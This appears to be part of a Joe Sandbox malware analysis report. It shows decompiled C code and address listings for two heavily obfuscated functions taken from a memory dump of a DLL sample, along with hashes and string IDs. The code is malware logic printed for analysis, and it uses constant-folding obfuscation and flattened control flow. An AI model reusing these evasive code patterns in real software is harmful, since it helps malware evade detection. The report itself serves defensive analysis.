                                                                                                          0x02ae7c1b
                                                                                                          0x02ae7c23
                                                                                                          0x02ae7c2b
                                                                                                          0x02ae7c2b
                                                                                                          0x02ae7c33
                                                                                                          0x02ae7c33
                                                                                                          0x02ae7c33
                                                                                                          0x02ae7c33
                                                                                                          0x02ae7c35
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae7c3b
                                                                                                          0x02ae7d45
                                                                                                          0x02ae7d48
                                                                                                          0x00000000
                                                                                                          0x02ae7c41
                                                                                                          0x02ae7c47
                                                                                                          0x02ae7d31
                                                                                                          0x02ae7d33
                                                                                                          0x02ae7d36
                                                                                                          0x00000000
                                                                                                          0x02ae7c4d
                                                                                                          0x02ae7c53
                                                                                                          0x02ae7d1b
                                                                                                          0x02ae7d20
                                                                                                          0x02ae7d23
                                                                                                          0x00000000
                                                                                                          0x02ae7c59
                                                                                                          0x02ae7c5f
                                                                                                          0x02ae7cdf
                                                                                                          0x02ae7ce0
                                                                                                          0x02ae7ce4
                                                                                                          0x02ae7ce9
                                                                                                          0x02ae7cec
                                                                                                          0x02ae7cee
                                                                                                          0x02ae7cf0
                                                                                                          0x02ae7cf6
                                                                                                          0x00000000
                                                                                                          0x02ae7cf6
                                                                                                          0x02ae7c61
                                                                                                          0x02ae7c67
                                                                                                          0x02ae7cb7
                                                                                                          0x02ae7cbc
                                                                                                          0x02ae7cbf
                                                                                                          0x00000000
                                                                                                          0x02ae7c69
                                                                                                          0x02ae7c6f
                                                                                                          0x00000000
                                                                                                          0x02ae7c75
                                                                                                          0x02ae7c90
                                                                                                          0x02ae7c95
                                                                                                          0x02ae7c98
                                                                                                          0x00000000
                                                                                                          0x02ae7c98
                                                                                                          0x02ae7c6f
                                                                                                          0x02ae7c67
                                                                                                          0x02ae7c5f
                                                                                                          0x02ae7c53
                                                                                                          0x02ae7c47
                                                                                                          0x00000000
                                                                                                          0x02ae7c3b
                                                                                                          0x02ae7d52
                                                                                                          0x02ae7d58
                                                                                                          0x02ae7e4e
                                                                                                          0x02ae7e53
                                                                                                          0x02ae7e56
                                                                                                          0x00000000
                                                                                                          0x02ae7d5e
                                                                                                          0x02ae7d5e
                                                                                                          0x02ae7d64
                                                                                                          0x02ae7e21
                                                                                                          0x02ae7e26
                                                                                                          0x02ae7e29
                                                                                                          0x00000000
                                                                                                          0x02ae7d6a
                                                                                                          0x02ae7d6a
                                                                                                          0x02ae7d6c
                                                                                                          0x02ae7dee
                                                                                                          0x02ae7df3
                                                                                                          0x02ae7df6
                                                                                                          0x00000000
                                                                                                          0x02ae7d6e
                                                                                                          0x02ae7d6e
                                                                                                          0x02ae7d74
                                                                                                          0x02ae7dca
                                                                                                          0x02ae7dcf
                                                                                                          0x02ae7dd2
                                                                                                          0x00000000
                                                                                                          0x02ae7d76
                                                                                                          0x02ae7d76
                                                                                                          0x02ae7d7c
                                                                                                          0x00000000
                                                                                                          0x02ae7d82
                                                                                                          0x02ae7d9d
                                                                                                          0x02ae7da2
                                                                                                          0x02ae7da5
                                                                                                          0x00000000
                                                                                                          0x02ae7da5
                                                                                                          0x02ae7d7c
                                                                                                          0x02ae7d74
                                                                                                          0x02ae7d6c
                                                                                                          0x02ae7d64
                                                                                                          0x00000000
                                                                                                          0x02ae7e5b
                                                                                                          0x02ae7e5b
                                                                                                          0x02ae7e5b
                                                                                                          0x02ae7e67
                                                                                                          0x02ae7e69
                                                                                                          0x02ae7e6e
                                                                                                          0x02ae7e6e
                                                                                                          0x02ae7e78

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: )uL$*$0i^$4-,a$sG'$&$[}
                                                                                                          • API String ID: 0-4036371101
                                                                                                          • Opcode ID: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
                                                                                                          • Instruction ID: 3643e85086c34e27e360dccdab0ea1b68e68afb305e18a2d3102f8007bd99b94
                                                                                                          • Opcode Fuzzy Hash: e280074acee194a8a4af21785d26579025f4db8ac7bfb2e7628ff9284e72021d
                                                                                                          • Instruction Fuzzy Hash: 4DF134715083849FD764CF21C889A5BFBF2FBC4708F50891DE69A86260DBB5994ACF43
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AE6B7A, Relevance: 9.0, Strings: 7, Instructions: 274COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 93%
                                                                                                          			E02AE6B7A(void* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr* _a8) {
				char _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v108;
				signed int _v112;
				char _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				void* _t242;
				void* _t265;
				void* _t269;
				signed int _t271;
				signed int _t272;
				char* _t274;
				signed int _t275;
				intOrPtr _t282;
				intOrPtr* _t285;
				void* _t287;
				signed int _t292;
				intOrPtr _t298;
				intOrPtr _t324;
				intOrPtr* _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				signed int _t330;
				signed int _t331;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				void* _t336;
				void* _t337;

				_t285 = _a8;
				_push(_t285);
				_push(_a4);
				_t326 = __edx;
				_push(__edx);
				_push(__ecx);
				E02AFFE29(_t242);
				_v100 = 0x757930;
				_t337 = _t336 + 0x10;
				_v96 = 0xd80ad;
				_t324 = 0;
				_v92 = 0x3caa7;
				_v88 = 0;
				_t287 = 0x43d278a;
				_v140 = 0xa476d3;
				_v140 = _v140 + 0x8b71;
				_v140 = _v140 ^ 0x00a50244;
				_v192 = 0x86f1c9;
				_v192 = _v192 | 0xd7b81b76;
				_t327 = 0x1d;
				_v192 = _v192 / _t327;
				_v192 = _v192 + 0xffff13d4;
				_v192 = _v192 ^ 0x076f980a;
				_v188 = 0x843aad;
				_v188 = _v188 << 0x10;
				_v188 = _v188 | 0xc1fad14f;
				_t328 = 0x74;
				_v188 = _v188 * 0x5b;
				_v188 = _v188 ^ 0x93eb17e1;
				_v168 = 0x8317bb;
				_v168 = _v168 ^ 0x1362ec48;
				_v168 = _v168 ^ 0x4008a55c;
				_v168 = _v168 ^ 0x53e7b525;
				_v144 = 0x20a76b;
				_v144 = _v144 / _t328;
				_v144 = _v144 ^ 0x000a47fb;
				_v196 = 0xe0aa92;
				_v196 = _v196 ^ 0x05a4f46c;
				_t329 = 0x24;
				_v196 = _v196 / _t329;
				_v196 = _v196 << 8;
				_v196 = _v196 ^ 0x257ea781;
				_v200 = 0xe588c5;
				_t330 = 0x29;
				_v200 = _v200 / _t330;
				_v200 = _v200 >> 6;
				_v200 = _v200 >> 0x10;
				_v200 = _v200 ^ 0x000d5940;
				_v164 = 0x4155a9;
				_v164 = _v164 >> 5;
				_v164 = _v164 | 0x5ba52662;
				_v164 = _v164 ^ 0x5ba55520;
				_v160 = 0x4466c5;
				_v160 = _v160 >> 9;
				_v160 = _v160 >> 3;
				_v160 = _v160 ^ 0x000d6457;
				_v148 = 0x35624e;
				_v148 = _v148 >> 0x10;
				_v148 = _v148 ^ 0x000abf08;
				_v172 = 0x5696ab;
				_v172 = _v172 + 0xe488;
				_v172 = _v172 + 0x10cb;
				_v172 = _v172 ^ 0x0055d7ec;
				_v128 = 0xad635c;
				_v128 = _v128 ^ 0xb55b0f96;
				_v128 = _v128 ^ 0xb5f22a9b;
				_v208 = 0x275835;
				_t108 =  &_v208; // 0x275835
				_t331 = 0x37;
				_push("true");
				_v208 =  *_t108 / _t331;
				_v208 = _v208 ^ 0xb04b577b;
				_pop(_t332);
				_v208 = _v208 / _t332;
				_v208 = _v208 ^ 0x055d5c1c;
				_v132 = 0x1cc441;
				_t333 = 0x6a;
				_v132 = _v132 / _t333;
				_v132 = _v132 ^ 0x000e83d7;
				_v204 = 0x125b67;
				_v204 = _v204 >> 5;
				_v204 = _v204 ^ 0xe127959b;
				_v204 = _v204 << 0x10;
				_v204 = _v204 ^ 0x07419ea5;
				_v180 = 0x68abbe;
				_v180 = _v180 | 0x57b8f8fa;
				_v180 = _v180 << 0xf;
				_v180 = _v180 ^ 0x7df5736a;
				_v156 = 0x6240f4;
				_v156 = _v156 + 0xffffe0b8;
				_t334 = 0x69;
				_v156 = _v156 * 0x13;
				_v156 = _v156 ^ 0x0741ad16;
				_v124 = 0xa95440;
				_v124 = _v124 / _t334;
				_v124 = _v124 ^ 0x00021dd5;
				_v176 = 0x6e61ec;
				_v176 = _v176 + 0x7ec3;
				_v176 = _v176 | 0x8e41022f;
				_v176 = _v176 ^ 0x8e60c50b;
				_v120 = 0x9285fa;
				_v120 = _v120 ^ 0x677ff2d5;
				_v120 = _v120 ^ 0x67e9a1bb;
				_v152 = 0x5286f5;
				_v152 = _v152 + 0xffff3b7a;
				_v152 = _v152 ^ 0x016928ba;
				_v152 = _v152 ^ 0x013cf174;
				_v184 = 0xd65a61;
				_v184 = _v184 * 0x45;
				_v184 = _v184 + 0xffff6116;
				_v184 = _v184 ^ 0x39cc51e9;
				_v136 = 0xa284b3;
				_v136 = _v136 + 0x4b38;
				_v136 = _v136 ^ 0x00a4fd93;
				while(_t287 != 0x1b81945) {
					if(_t287 == 0x314f545) {
						_t265 = E02B046BD(_v188,  &_v108, _v168, _v144, _v196,  &_v116);
						_t337 = _t337 + 0x10;
						if(_t265 == 0) {
							L25:
							return _t324;
						}
						_t287 = 0x958f9d6;
						continue;
					}
					if(_t287 == 0x43d278a) {
						_t287 = 0xee3ea02;
						continue;
					}
					if(_t287 == 0x55d8418) {
						_t292 = _v172;
						_t269 = E02B007AA(_t292, _v128,  &_v84, _v208,  &_v76);
						_t337 = _t337 + 0xc;
						if(_t269 != 0) {
							_push(_t292);
							_push(_t292);
							_t282 = E02AEC5D8(_v80);
							_t337 = _t337 + 0xc;
							 *_t326 = _t282;
							if(_t282 != 0) {
								E02AFC9B0(_v124,  *_t326, _v176, _v80, _v84, _v120);
								_t337 = _t337 + 0x10;
								 *((intOrPtr*)(_t326 + 4)) = _v80;
								_t324 = 1;
							}
						}
						_t287 = 0x1b81945;
						continue;
					}
					if(_t287 == 0x958f9d6) {
						_t271 = E02AEC473( &_v108, _v200, _v164, _v160, _v148,  &_v84);
						_t337 = _t337 + 0x10;
						asm("sbb ecx, ecx");
						_t287 = ( ~_t271 & 0x03a56ad3) + 0x1b81945;
						continue;
					}
					if(_t287 != 0xee3ea02) {
						L24:
						if(_t287 != 0x1eefa0b) {
							continue;
						}
						goto L25;
					}
					_t272 =  *((intOrPtr*)(_t285 + 4));
					_t298 =  *_t285;
					_v112 = _t272;
					_v116 = _t298;
					_t274 = _t272 - 1 + _t298;
					while(_t274 > _t298) {
						if( *_t274 == 0) {
							break;
						}
						_t274 = _t274 - 1;
					}
					_t275 = _t274 - _t298;
					_v112 = _t275;
					if(_t275 == 0) {
						L14:
						_t287 = 0x314f545;
						continue;
					}
					while(_v112 % _v192 != _v140) {
						_t207 =  &_v112;
						 *_t207 = _v112 - 1;
						if( *_t207 != 0) {
							continue;
						}
						goto L14;
					}
					goto L14;
				}
				E02B02B09(_v152, _v108, _v184, _v136);
				_t287 = 0x1eefa0b;
				goto L24;
			}




























































                                                                                                          0x02ae6b81
                                                                                                          0x02ae6b8b
                                                                                                          0x02ae6b8c
                                                                                                          0x02ae6b93
                                                                                                          0x02ae6b95
                                                                                                          0x02ae6b96
                                                                                                          0x02ae6b97
                                                                                                          0x02ae6b9c
                                                                                                          0x02ae6ba7
                                                                                                          0x02ae6baa
                                                                                                          0x02ae6bb5
                                                                                                          0x02ae6bb7
                                                                                                          0x02ae6bc4
                                                                                                          0x02ae6bcb
                                                                                                          0x02ae6bd0
                                                                                                          0x02ae6bd8
                                                                                                          0x02ae6be0
                                                                                                          0x02ae6be8
                                                                                                          0x02ae6bf0
                                                                                                          0x02ae6bfe
                                                                                                          0x02ae6c03
                                                                                                          0x02ae6c09
                                                                                                          0x02ae6c11
                                                                                                          0x02ae6c19
                                                                                                          0x02ae6c21
                                                                                                          0x02ae6c26
                                                                                                          0x02ae6c33
                                                                                                          0x02ae6c36
                                                                                                          0x02ae6c3a
                                                                                                          0x02ae6c42
                                                                                                          0x02ae6c4a
                                                                                                          0x02ae6c52
                                                                                                          0x02ae6c5a
                                                                                                          0x02ae6c62
                                                                                                          0x02ae6c72
                                                                                                          0x02ae6c76
                                                                                                          0x02ae6c7e
                                                                                                          0x02ae6c86
                                                                                                          0x02ae6c92
                                                                                                          0x02ae6c97
                                                                                                          0x02ae6c9d
                                                                                                          0x02ae6ca2
                                                                                                          0x02ae6caa
                                                                                                          0x02ae6cb6
                                                                                                          0x02ae6cb9
                                                                                                          0x02ae6cbd
                                                                                                          0x02ae6cc2
                                                                                                          0x02ae6cc7
                                                                                                          0x02ae6ccf
                                                                                                          0x02ae6cd7
                                                                                                          0x02ae6cdc
                                                                                                          0x02ae6ce4
                                                                                                          0x02ae6cec
                                                                                                          0x02ae6cf4
                                                                                                          0x02ae6cf9
                                                                                                          0x02ae6cfe
                                                                                                          0x02ae6d06
                                                                                                          0x02ae6d0e
                                                                                                          0x02ae6d13
                                                                                                          0x02ae6d1b
                                                                                                          0x02ae6d23
                                                                                                          0x02ae6d2d
                                                                                                          0x02ae6d35
                                                                                                          0x02ae6d3d
                                                                                                          0x02ae6d45
                                                                                                          0x02ae6d4d
                                                                                                          0x02ae6d55
                                                                                                          0x02ae6d5d
                                                                                                          0x02ae6d63
                                                                                                          0x02ae6d66
                                                                                                          0x02ae6d68
                                                                                                          0x02ae6d6e
                                                                                                          0x02ae6d7a
                                                                                                          0x02ae6d7f
                                                                                                          0x02ae6d85
                                                                                                          0x02ae6d8d
                                                                                                          0x02ae6d99
                                                                                                          0x02ae6d9e
                                                                                                          0x02ae6da4
                                                                                                          0x02ae6dac
                                                                                                          0x02ae6db4
                                                                                                          0x02ae6db9
                                                                                                          0x02ae6dc1
                                                                                                          0x02ae6dc6
                                                                                                          0x02ae6dce
                                                                                                          0x02ae6dd6
                                                                                                          0x02ae6dde
                                                                                                          0x02ae6de3
                                                                                                          0x02ae6deb
                                                                                                          0x02ae6df3
                                                                                                          0x02ae6e00
                                                                                                          0x02ae6e01
                                                                                                          0x02ae6e05
                                                                                                          0x02ae6e0d
                                                                                                          0x02ae6e20
                                                                                                          0x02ae6e24
                                                                                                          0x02ae6e2c
                                                                                                          0x02ae6e34
                                                                                                          0x02ae6e3c
                                                                                                          0x02ae6e44
                                                                                                          0x02ae6e4c
                                                                                                          0x02ae6e54
                                                                                                          0x02ae6e5c
                                                                                                          0x02ae6e64
                                                                                                          0x02ae6e6c
                                                                                                          0x02ae6e74
                                                                                                          0x02ae6e7c
                                                                                                          0x02ae6e84
                                                                                                          0x02ae6e91
                                                                                                          0x02ae6e95
                                                                                                          0x02ae6e9d
                                                                                                          0x02ae6ea5
                                                                                                          0x02ae6ead
                                                                                                          0x02ae6eb5
                                                                                                          0x02ae6ebd
                                                                                                          0x02ae6ecb
                                                                                                          0x02ae702a
                                                                                                          0x02ae702f
                                                                                                          0x02ae7034
                                                                                                          0x02ae706b
                                                                                                          0x02ae7077
                                                                                                          0x02ae7077
                                                                                                          0x02ae7036
                                                                                                          0x00000000
                                                                                                          0x02ae7036
                                                                                                          0x02ae6ed7
                                                                                                          0x02ae7004
                                                                                                          0x00000000
                                                                                                          0x02ae7004
                                                                                                          0x02ae6ee3
                                                                                                          0x02ae6f94
                                                                                                          0x02ae6f99
                                                                                                          0x02ae6f9e
                                                                                                          0x02ae6fa3
                                                                                                          0x02ae6fb5
                                                                                                          0x02ae6fb6
                                                                                                          0x02ae6fbe
                                                                                                          0x02ae6fc3
                                                                                                          0x02ae6fc6
                                                                                                          0x02ae6fca
                                                                                                          0x02ae6fe8
                                                                                                          0x02ae6ff6
                                                                                                          0x02ae6ff9
                                                                                                          0x02ae6ffc
                                                                                                          0x02ae6ffc
                                                                                                          0x02ae6fca
                                                                                                          0x02ae6ffd
                                                                                                          0x00000000
                                                                                                          0x02ae6ffd
                                                                                                          0x02ae6eef
                                                                                                          0x02ae6f62
                                                                                                          0x02ae6f67
                                                                                                          0x02ae6f6e
                                                                                                          0x02ae6f76
                                                                                                          0x00000000
                                                                                                          0x02ae6f76
                                                                                                          0x02ae6ef7
                                                                                                          0x02ae705f
                                                                                                          0x02ae7065
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae7065
                                                                                                          0x02ae6efd
                                                                                                          0x02ae6f00
                                                                                                          0x02ae6f02
                                                                                                          0x02ae6f07
                                                                                                          0x02ae6f0b
                                                                                                          0x02ae6f15
                                                                                                          0x02ae6f12
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae6f14
                                                                                                          0x02ae6f14
                                                                                                          0x02ae6f19
                                                                                                          0x02ae6f1b
                                                                                                          0x02ae6f1f
                                                                                                          0x02ae6f39
                                                                                                          0x02ae6f39
                                                                                                          0x00000000
                                                                                                          0x02ae6f39
                                                                                                          0x02ae6f21
                                                                                                          0x02ae6f33
                                                                                                          0x02ae6f33
                                                                                                          0x02ae6f37
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x00000000
                                                                                                          0x02ae6f37
                                                                                                          0x00000000
                                                                                                          0x02ae6f21
                                                                                                          0x02ae7053
                                                                                                          0x02ae705a
                                                                                                          0x00000000

                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.704266978.0000000002AE1000.00000020.00000001.sdmp, Offset: 02AE0000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.704223856.0000000002AE0000.00000004.00000001.sdmp Download File
                                                                                                          • Associated: 00000000.00000002.704516476.0000000002B06000.00000004.00000001.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_2ae0000_loaddll32.jbxd
                                                                                                          Yara matches
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0yu$5X'$8K$@Y$Nb5$Wd$an
                                                                                                          • API String ID: 0-1112794312
                                                                                                          • Opcode ID: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
                                                                                                          • Instruction ID: c574a45f1c1b39cb62be0b12914de0515bc9387fa9b09e35c180908da476e75c
                                                                                                          • Opcode Fuzzy Hash: 8ceae2b30f000509da637a0984cc5bd8077a08d23a0df455bcfc612fb6287505
                                                                                                          • Instruction Fuzzy Hash: 80C112715083408FD768CF66C589A1BBBF2FBD5748F108D1EF69686260DBB1894ACF42
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Function 02AFDC71, Relevance: 9.0, Strings: 7, Instructions: 237COMMONCrypto
                                                                                                          Download Yara Rule
                                                                                                          C-Code - Quality: 97%
                                                                                                          			E02AFDC71() {
				signed int _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				void* _t246;
				intOrPtr* _t248;
				signed int _t254;
				intOrPtr _t255;
				intOrPtr* _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				signed int _t261;
				signed int _t262;
				void* _t263;
				void* _t290;
				signed int* _t294;

				_t294 =  &_v108;
				_v28 = 0x1aa6a3;
				_v28 = _v28 >> 4;
				_v28 = _v28 ^ 0x8001aa6b;
				_v68 = 0xf966b1;
				_v68 = _v68 | 0xf5f58fdd;
				_v4 = 0;
				_t290 = 0xa5173af;
				_t257 = 0x26;
				_v68 = _v68 / _t257;
				_v68 = _v68 ^ 0x0679357b;
				_v108 = 0xb8ff00;
				_v108 = _v108 | 0x28c12dd3;
				_t258 = 0x42;
				_v108 = _v108 / _t258;
				_v108 = _v108 + 0x2548;
				_v108 = _v108 ^ 0x0093f641;
				_v80 = 0x4a20cb;
				_v80 = _v80 | 0x50657e73;
				_v80 = _v80 >> 7;
				_v80 = _v80 ^ 0x00ac2c39;
				_v84 = 0x6237d1;
				_v84 = _v84 ^ 0x87c50ead;
				_v84 = _v84 << 4;
				_v84 = _v84 ^ 0x7a73b039;
				_v88 = 0x617a8;
				_v88 = _v88 << 0xa;
				_v88 = _v88 >> 0xc;
				_v88 = _v88 ^ 0x00004866;
				_v96 = 0x113f2;
				_v96 = _v96 + 0x334b;
				_v96 = _v96 << 0xb;
				_v96 = _v96 ^ 0x0285e17a;
				_v96 = _v96 ^ 0x08b84672;
				_v60 = 0x4bd9b6;
				_v60 = _v60 ^ 0x6ba7848f;
				_v60 = _v60 | 0xa40fa4df;
				_v60 = _v60 ^ 0xefe49c55;
				_v100 = 0xb12c48;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x0d420031;
				_t259 = 0x33;
				_v100 = _v100 / _t259;
				_v100 = _v100 ^ 0x004184fb;
				_v104 = 0x387c2e;
				_v104 = _v104 << 5;
				_t260 = 0x72;
				_v104 = _v104 / _t260;
				_v104 = _v104 >> 0xc;
				_v104 = _v104 ^ 0x0003fa0e;
				_v64 = 0x9254d3;
				_v64 = _v64 ^ 0xec8ec683;
				_v64 = _v64 + 0xffff5a55;
				_v64 = _v64 ^ 0xec1fa99d;
				_v72 = 0xb608b;
				_v72 = _v72 + 0xffffc85a;
				_t261 = 0x43;
				_v72 = _v72 / _t261;
				_v72 = _v72 ^ 0x00012617;
				_v32 = 0x2b47af;
				_t262 = 0x73;
				_t254 = _v4;
				_v32 = _v32 / _t262;
				_v32 = _v32 ^ 0x0007dbbc;
				_v76 = 0xa2cc58;
				_v76 = _v76 * 0x79;
				_v76 = _v76 + 0x1556;
				_v76 = _v76 ^ 0x4cf4e816;
				_v36 = 0x411f8a;
				_v36 = _v36 ^ 0x039a7593;
				_v36 = _v36 ^ 0x03d0076c;
				_v48 = 0x32f559;
				_v48 = _v48 + 0x88cf;
				_v48 = _v48 >> 4;
				_v48 = _v48 ^ 0x000c1178;
				_v92 = 0xe53134;
				_v92 = _v92 + 0xffffd6c4;
				_v92 = _v92 + 0xfffff637;
				_v92 = _v92 ^ 0x9e819fd3;
				_v92 = _v92 ^ 0x9e661668;
				_v52 = 0x962c48;
				_v52 = _v52 + 0x54df;
				_v52 = _v52 << 4;
				_v52 = _v52 ^ 0x096c20fe;
				_v56 = 0x38983;
				_v56 = _v56 * 0x7b;
				_v56 = _v56 ^ 0x1e2e8742;
				_v56 = _v56 ^ 0x1f9fc20c;
				_v20 = 0x39c3;
				_v20 = _v20 ^ 0xdc0c04ea;
				_v20 = _v20 ^ 0xdc0d303f;
				_v44 = 0xdd799f;
				_v44 = _v44 + 0xffffa96c;
				_v44 = _v44 >> 0xc;
				_v44 = _v44 ^ 0x0003bcd5;
				_v24 = 0x7b2b38;
				_v24 = _v24 * 0x48;
				_v24 = _v24 ^ 0x22aaeece;
				_v40 = 0x38897c;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 | 0xf4a0afb0;
				_v40 = _v40 ^ 0xf4ac49e4;
				_v12 = 0x92ab49;
				_v12 = _v12 ^ 0x4b1e6875;
				_v12 = _v12 ^ 0x4b80c344;
				_v16 = 0x5228cc;
				_v16 = _v16 | 0xaae3d00d;
				_v16 = _v16 ^ 0xaaf963f0;
				while(1) {
					L1:
					_t263 = 0x5c;
					while(1) {
						_t246 = 0xc02063;
						do {
							L3:
							while(_t290 != 0x13579) {
								if(_t290 == _t246) {
									_t248 = E02B0298D(_v20, _v44, _v24, _v8, _t254);
									_t294 =  &(_t294[3]);
									__eflags = _t248;
									_t290 = 0x13579;
									_v4 = 0 | __eflags == 0x00000000;
									goto L1;
								} else {
									if(_t290 == 0x79b4c83) {
										_push(_v88);
										_push(_v84);
										_push(_v80);
										__eflags = E02AE2DEA(_v96,  &_v8, _v60, 0x2ae10a0, _v28, _v100, 0x2ae10a0, 0x2ae10a0, _v104, _v64, 0x2ae10a0, 0x2ae10a0, _v68, _v72, _v32, _v76, _v36, E02AFE1F8(0x2ae10a0, _v108, __eflags));
										_t290 =  ==  ? 0xc02063 : 0x61b9dc3;
										E02AFFECB(_t249, _v48, _v92, _v52, _v56);
										_t294 =  &(_t294[0x16]);
										L16:
										_t246 = 0xc02063;
										_t263 = 0x5c;
									} else {
										if(_t290 == 0xa5173af) {
											_t290 = 0xac8592e;
											continue;
										} else {
											if(_t290 == 0xac8592e) {
												_t255 =  *0x2b06214; // 0x0
												_t256 = _t255 + 0x23c;
												while( *_t256 != _t263) {
													_t256 = _t256 + 2;
													__eflags = _t256;
												}
												_t254 = _t256 + 2;
												_t290 = 0x79b4c83;
												_t246 = 0xc02063;
												continue;
											}
										}
									}
								}
								goto L17;
							}
							E02AE53D0(_v40, _v12, _v16, _v8);
							_t290 = 0x61b9dc3;
							goto L16;
							L17:
							__eflags = _t290 - 0x61b9dc3;
						} while (__eflags != 0);
						return _v4;
					}
				}
			}












































                                                                                                          0x02afdc71
                                                                                                          0x02afdc74
                                                                                                          0x02afdc7e
                                                                                                          0x02afdc85
                                                                                                          0x02afdc8d
                                                                                                          0x02afdc95
                                                                                                          0x02afdca1
                                                                                                          0x02afdca5
                                                                                                          0x02afdcb0
                                                                                                          0x02afdcb5
                                                                                                          0x02afdcbb
                                                                                                          0x02afdcc3
                                                                                                          0x02afdccb
                                                                                                          0x02afdcd7
                                                                                                          0x02afdcdc
                                                                                                          0x02afdce2
                                                                                                          0x02afdcea
                                                                                                          0x02afdcf2
                                                                                                          0x02afdcfa
                                                                                                          0x02afdd02
                                                                                                          0x02afdd07
                                                                                                          0x02afdd0f
                                                                                                          0x02afdd17
                                                                                                          0x02afdd1f
                                                                                                          0x02afdd24
                                                                                                          0x02afdd2c
                                                                                                          0x02afdd34
                                                                                                          0x02afdd39
                                                                                                          0x02afdd3e
                                                                                                          0x02afdd46
                                                                                                          0x02afdd4e
                                                                                                          0x02afdd56
                                                                                                          0x02afdd5b
                                                                                                          0x02afdd63
                                                                                                          0x02afdd6b
                                                                                                          0x02afdd73
                                                                                                          0x02afdd7b
                                                                                                          0x02afdd83
                                                                                                          0x02afdd8b
                                                                                                          0x02afdd93
                                                                                                          0x02afdd98
                                                                                                          0x02afdda4
                                                                                                          0x02afdda9
                                                                                                          0x02afddaf
                                                                                                          0x02afddb7
                                                                                                          0x02afddbf
                                                                                                          0x02afddc8
                                                                                                          0x02afddcd
                                                                                                          0x02afddd3
                                                                                                          0x02afddd8
                                                                                                          0x02afdde0
                                                                                                          0x02afdde8
                                                                                                          0x02afddf0
                                                                                                          0x02afddf8
                                                                                                          0x02afde00
                                                                                                          0x02afde08
                                                                                                          0x02afde14
                                                                                                          0x02afde17
                                                                                                          0x02afde1d
                                                                                                          0x02afde2a
                                                                                                          0x02afde38
                                                                                                          0x02afde3b
                                                                                                          0x02afde3f
                                                                                                          0x02afde43
                                                                                                          0x02afde4b
                                                                                                          0x02afde58
                                                                                                          0x02afde5c
                                                                                                          0x02afde64
                                                                                                          0x02afde6c
                                                                                                          0x02afde74
                                                                                                          0x02afde7c
                                                                                                          0x02afde84
                                                                                                          0x02afde8c
                                                                                                          0x02afde94
                                                                                                          0x02afde99
                                                                                                          0x02afdea1
                                                                                                          0x02afdea9
                                                                                                          0x02afdeb1
                                                                                                          0x02afdeb9
                                                                                                          0x02afdec1
                                                                                                          0x02afdec9
                                                                                                          0x02afded1
                                                                                                          0x02afded9
                                                                                                          0x02afdede
                                                                                                          0x02afdee6
                                                                                                          0x02afdef3
                                                                                                          0x02afdef7
                                                                                                          0x02afdeff
                                                                                                          0x02afdf07
                                                                                                          0x02afdf0f
                                                                                                          0x02afdf17
                                                                                                          0x02afdf1f
                                                                                                          0x02afdf27
                                                                                                          0x02afdf2f
                                                                                                          0x02afdf34
                                                                                                          0x02afdf3c
                                                                                                          0x02afdf49
                                                                                                          0x02afdf4d
                                                                                                          0x02afdf55
                                                                                                          0x02afdf5d
                                                                                                          0x02afdf62
                                                                                                          0x02afdf6a
                                                                                                          0x02afdf72
                                                                                                          0x02afdf7a
                                                                                                          0x02afdf82
                                                                                                          0x02afdf8a
                                                                                                          0x02afdf92
                                                                                                          0x02afdf9a
                                                                                                          0x02afdfa2
                                                                                                          0x02afdfa2
                                                                                                          0x02afdfa4
                                                                                                          0x02afdfa5
                                                                                                          0x02afdfa5
                                                                                                          0x02afdfaa
                                                                                                          0x00000000
                                                                                                          0x02afdfaa
                                                                                                          0x02afdfb8
                                                                                                          0x02afe0a0
                                                                                                          0x02afe0a7
                                                                                                          0x02afe0aa
